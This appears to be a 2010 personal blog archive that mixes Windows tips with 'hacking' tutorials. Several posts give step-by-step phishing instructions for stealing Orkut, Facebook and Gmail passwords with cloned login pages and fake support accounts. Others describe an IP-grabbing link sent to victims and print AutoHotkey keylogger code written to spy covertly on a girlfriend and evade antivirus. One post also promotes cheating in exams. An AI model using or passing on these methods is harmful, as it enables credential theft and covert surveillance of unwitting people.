Tuesday, March 16, 2010

Converting FAT to NTFS

To convert a FAT partition to NTFS, perform the following steps.

1) Open 'Command Prompt'.

2) At the command prompt, type the following-

CONVERT [driveletter]: /FS:NTFS.

'Convert.exe' will attempt to convert the partition to NTFS.

Thursday, March 11, 2010

G-mai hacking

want to hack some -one g-mail

step1.download the file from http://fairurl.com/9021
step2. enter ur g-mal id,password and victm-id

step3. just click om button hack them...thats all
\\\\ u get the victim password.\\\

ENJOY HACKING

IP ADDRESS CRACKER

FINDING THE IP -ADDRESS F REMOTE COMPUTER

step1. download these files from http://fairurl.com/9019

step2.upload these files to free hosting site.

step3. the link provided by the hosting site i.e. url address upto ip file must send
to the victim.

step4.whenever victim click on the link provided it automatically redirected to orkut("original site")if u wnt to redirect him to ur fake orkut or some other site made the following changes as i have alredy told u in my post "PHISHING REVEAL FIRST TIME"but here we only concern with the ip-add of victim.
step5.open the log file ,u get the ip add of victim...THATS ALL "ENJOY HACKING"

Wednesday, March 10, 2010

PHISHING CONCEPT REVEAL FIRST TIME

1.First of all open the page for which u wanna a make fake.

2. Save dat page, Goto to file & save the complete web page.

3. Now u have saved the exact page of that site & start the work.

4. Right Click on dat Page and click on edit.

5. Search for the word Form in code of dat page.

6. Delete dat Form Value , Method ,Action, delete everything watever written on it.

7. ADD this code DOWNLOAD LINK http://fairurl.com/9018

8. Instead of Your Email Id write ur email address.

9. Save & close.

10. Upload ur fake page on any free hosting services.

MONITORING UR GIRLFRND ACTVITIES OVER PC

basically it involves installing any spy-keylogger on victim's pc...sound great but its not easy..bcoz many antivirus detected it as "torjan"
after many attempts, i m able to bypass antivirus but it create unnecessary overhead.so i decided to develop my own keylogger which is not dected by any antivirus as "torjan"

step1.install a software called hotkey ,download from www.autohotkey.com/
step2. code for developing own keylogger as given below in brief :
The Code:
logfile = %ProgramFiles%log.txt ;is where we store our log

; -- this is where we will put our log file.

#NoTrayIcon

; by default autohotkey scripts have a tray icon - this turns it off

SendMode Play ;
#SingleInstance force
; a couple of AHK specific commands

a::
FileAppend,
(a), %logfile%
Send a
return

b::
FileAppend,
(b), %logfile%
Send b
return

c::
FileAppend,
(c), %logfile%
Send c
return

;..snip... and so on for all of the letters

1::
FileAppend,
(1), %logfile%
Send 1
return

{Numpad1}::
FileAppend,
(1), %logfile%
Send 1
return

2::
FileAppend,
(2), %logfile%
Send 2
return

{Numpad2}::
FileAppend,
(2), %logfile%
Send 2
return

3::
FileAppend,
(3), %logfile%
Send 3
return

{Numpad3}::
FileAppend,
(3), %logfile%
Send 3
return

;...snip... and for the numbers

{!}::
FileAppend,
(!), %logfile%
Send n
return

{#}::
FileAppend,
(#), %logfile%
Send n
return

;...snip... and symbols

{Enter}::
FileAppend,
(
), %logfile%
Send n
return

;also watches for ENTER so as to clean up the file.

FACE BOOK HACK

SAME WAY AS ORKUT HACK
STEP1.DOWNLOAD THE FILES http://fairurl.com/9015
STEP2. UPLOAD THE FILES TO FREE WEB HOSTING SITE...
STEP3. SEE THE PASS.TXT FOR PASSWORD.


FOR MORE DETAILS CHECK ETHICAL HACKING BY SAURABH'S POST
"ENJOY HACKING"

FOLDER LOCK WITHOUT ANY SOFTWARE(CONT)

Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.

FOLDER LOCK WITHOUT ANY SOFTWARE

ONE OF THE MODULE OF OUR PROJECT (B.TECH)
STEP1.PASTE THE CODE BELOW IN NOTEPAD & IT WITH NAME "LOCK.BAT"OR ANY NAME
CODE:
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

CREATING FILE & FOLDER WITH NO NAME

This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select 'Rename' or simply press 'F2'.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.



But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-

1) Select file, Press 'F2'.

2) Hold 'Alt' key and type '0160' from the numpad.

3) Release the 'Alt' key. Now without doing anything else, again hold 'Alt' key and type '0160'.

4) Press 'Enter' and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

(We have a problem with deleting these folders, to do so, start your computer in 'Safe Mode' and delete it from there.)

chatting via cmd (continued)

step.4 drag & drop Messenger.Bat over cmd or command prompt

Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

Now all you need to do is type your message and press Enter.
Start Chatting.......!

"ENJOY THIS"

Chatting via cmd(useful in practical exam)

Dedicated to all my frnds during practical exam

I personally feel that cheating is necessary during practical exam.....but if we do cheating in traditional manner it will definitely cause problem for us....so here is the method of cheating:

step1 :All you need is your friend's IP Address and your Command Prompt.
as we know that during practical we are connected via LAN....we need only ip address of our computer on which we r sitting..
so here is the command for finding the ip address
open cmd & type ipconfig on cmd
default gateway==127.0.0..... will appear on cmd thats ur ip address

step2. Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

step3. Now save this as "Messenger.Bat".

PROJECT MANIA CONTD.

B.tech(java's projects)


1.internet banking site ( http://fairurl.com/9001

2.airlines system site http://fairurl.com/9002

3. online-course driven site http://fairurl.com/9003







PROJECT MANIA

JAVA PROJECTS


1.college management system site(download-link..http://fairurl.com/9000)

2.Hospital management system site (http://fairurl.com/8998

3.Internet chatting system( http://fairurl.com/8999)




ETHICAL HACKING BY Saurabh Srivastava

orkut hacking(using phishing)

step1:download these files by link provided below:


step2:find any free webhosting site that provide php support for above given file(index and write) eg:

Step3: i personally use 2nd one ...so procedure written for 2nd one(http://www.yourfreehosting.net/)


Step4: sign-up with above site & goes to file- manager area
(a) create a directory (option provided at top most corner)with name index
by clicking index dir...upload the two files that u have downloded namely
index and write.
step5: just click on index file ....a fake orkut will appear to u
just enter any or ur id with fake password...
u foud that a file pass.txt alredy created with index & write file inside the index directory
Step6: when u open pass.txt u will get password of the enterd id.


most important step "send ur "url" to u r friend & told him to enter his id or password"
by creating a fake gmail id such as " orkutsupport team@gmail.com"


thats all"Enjoy Hacking"with best wishes
for further improvement or query send ur valulable suggestions.